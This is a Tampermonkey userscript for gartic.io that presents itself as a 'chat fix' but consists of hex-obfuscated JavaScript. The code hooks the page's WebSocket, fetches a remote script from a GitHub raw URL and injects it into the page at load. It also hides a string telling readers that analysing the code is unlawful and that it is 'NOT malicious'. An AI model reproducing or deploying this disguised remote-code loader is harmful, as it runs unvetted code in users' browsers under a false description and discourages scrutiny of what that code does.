// ==UserScript==
// @name         Gartic Chat Fix Beta (Public Version)
// @namespace    http://tampermonkey.net/
// @version      Open Beta Test
// @description  Fixes chat rendering issues and improves connectivity.
// @author       Yusf
// @match        https://gartic.io/*
// @grant        GM_xmlhttpRequest
// @grant        GM_addElement
// @connect      raw.githubusercontent.com
// @run-at       document-start
// @updateURL    https://raw.githubusercontent.com/yusifmuradliroot/gartictools-openscript_reconstruction/refs/heads/main/loader_main/loader_1.0.0_US.js.txt
// ==/UserScript==
/*
LICENSE:
This software is for personal use only. No redistribution allowed.
By using this script, you agree to the terms of the repository license.
Unauthorized commercial use or sharing is prohibited.
*/
(function(){'use strict';var _p=["\x68\x74\x74\x70\x73\x3a\x2f\x2f\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x79\x75\x73\x69\x66\x6d\x75\x72\x61\x64\x6c\x69\x72\x6f\x6f\x74\x2f\x67\x61\x72\x74\x69\x63\x74\x6f\x6f\x6c\x73\x2d\x6f\x70\x65\x6e\x73\x63\x72\x69\x70\x74\x5f\x72\x65\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x2f\x72\x65\x66\x73\x2f\x68\x65\x61\x64\x73\x2f\x6d\x61\x69\x6e\x2f\x6c\x6f\x61\x64\x65\x72\x5f\x6d\x61\x69\x6e\x2f\x69\x6e\x6a\x65\x63\x74\x2e\x6a\x73\x2e\x74\x78\x74","\x57\x65\x62\x53\x6f\x63\x6b\x65\x74","\x70\x72\x6f\x74\x6f\x74\x79\x70\x65","\x61\x73\x73\x69\x67\x6e","\x73\x70\x6c\x69\x74","\x0a","\x69\x6e\x63\x6c\x75\x64\x65\x73","\x2f\x2f","\x6d\x61\x74\x63\x68","\x74\x65\x78\x74\x43\x6f\x6e\x74\x65\x6e\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x53\x54\x4f\x50\x2e\x20\x52\x65\x61\x64\x69\x6e\x67\x20\x6f\x72\x20\x61\x6e\x61\x6c\x79\x7a\x69\x6e\x67\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x63\x6f\x6e\x73\x74\x69\x74\x75\x74\x65\x73\x20\x61\x20\x76\x69\x6f\x6c\x61\x74\x69\x6f\x6e\x20\x6f\x66\x20\x69\x6e\x74\x65\x6c\x6c\x65\x63\x74\x75\x61\x6c\x20\x70\x72\x6f\x70\x65\x72\x74\x79\x20\x72\x69\x67\x68\x74\x73\x20\x61\x6e\x64\x20\x69\x73\x20\x63\x6f\x6e\x73\x69\x64\x65\x72\x65\x64\x20\x75\x6e\x61\x75\x74\x68\x6f\x72\x69\x7a\x65\x64\x20\x72\x65\x76\x65\x72\x73\x65\x20\x65\x6e\x67\x69\x6e\x65\x65\x72\x69\x6e\x67\x2e\x20\x54\x68\x69\x73\x20\x69\x73\x20\x4e\x4f\x54\x20\x6d\x61\x6c\x69\x63\x69\x6f\x75\x73\x20\x73\x6f\x66\x74\x77\x61\x72\x65\x3b\x20\x69\x74\x20\x69\x73\x20\x61\x20\x70\x72\x6f\x74\x65\x63\x74\x69\x76\x65\x20\x6d\x65\x61\x73\x75\x72\x65\x20\x74\x6f\x20\x70\x72\x65\x76\x65\x6e\x74\x20\x67\x61\x6d\x65\x20\x68\x69\x65\x72\x61\x72\x63\x68\x79\x20\x64\x69\x73\x72\x75\x70\x74\x69\x6f\x6e\x20\x62\x79\x20\x75\x6e\x61\x75\x74\x68\x6f\x72\x69\x7a\x65\x64\x20\x70\x61\x72\x74\x69\x65\x73\x2e\x20\x49\x66\x20\x79\x6f\x75\x20\x61\x72\x65\x20\x61\x20\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x20\x73\x65\x65\x6b\x69\x6e\x67\x20\x6c\x65\x67\x61\x6c\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x20\x74\x6f\x20\x6d\x6f\x64\x69\x66\x79\x20\x6f\x72\x20\x73\x74\x75\x64\x79\x20\x70\x61\x72\x74\x73\x20\x6f\x66\x20\x74\x68\x69\x73\x20\x73\x63\x72\x69\x70\x74\x2c\x20\x70\x6c\x65\x61\x73\x65\x20\x63\x6f\x6e\x74\x61\x63\x74\x20\x74\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x76\x69\x61\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x75\x73\x69\x66\x6d\x75\x72\x61\x64\x6c\x69\x72\x6f\x6f\x74\x2e\x67\x69\x74\x68\x75\x62\x2e\x69\x6f\x2f\x65\x61\x73\x79\x6c\x69\x6e\x6b\x2f\x2e\x20\x52\x65\x73\x70\x65\x63\x74\x66\x75\x6c\x6c\x79\x2c\x20\x2d\x59\x75\x73\x66\x2e","\x6d\x65\x74\x68\x6f\x64","\x47\x45\x54","\x75\x72\x6c","\x6f\x6e\x6c\x6f\x61\x64","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6f\x6e\x73\x65\x54\x65\x78\x74","\x6f\x6e\x65\x72\x72\x6f\x72"];var _g=function(i){return _p[i];};var _ws=window[_g(1)];window[_g(1)]=function(u,p){return new _ws(u,p);};window[_g(1)][_g(2)]=_ws[_g(2)];Object[_g(3)](window[_g(1)],_ws);function _inj(c){window[_g(1)]=_ws;var v="Unknown";try{var l=c[_g(4)](_g(5))[0];if(l&&l[_g(6)](_g(7))){var m=l[_g(8)](/\/\/\s*v?(\d+\.\d+\.\d+)/i);if(m&&m[1])v=m[1];}}catch(e){}GM_addElement('script',{[_g(9)]:c,[_g(10)]:_g(11)});}GM_xmlhttpRequest({[_g(13)]:_g(14),[_g(15)]:_g(0),[_g(16)]:function(r){if(r[_g(17)]===200&&r[_g(18)])_inj(r[_g(18)]);else window[_g(1)]=_ws;},[_g(19)]:function(){window[_g(1)]=_ws;}});})();
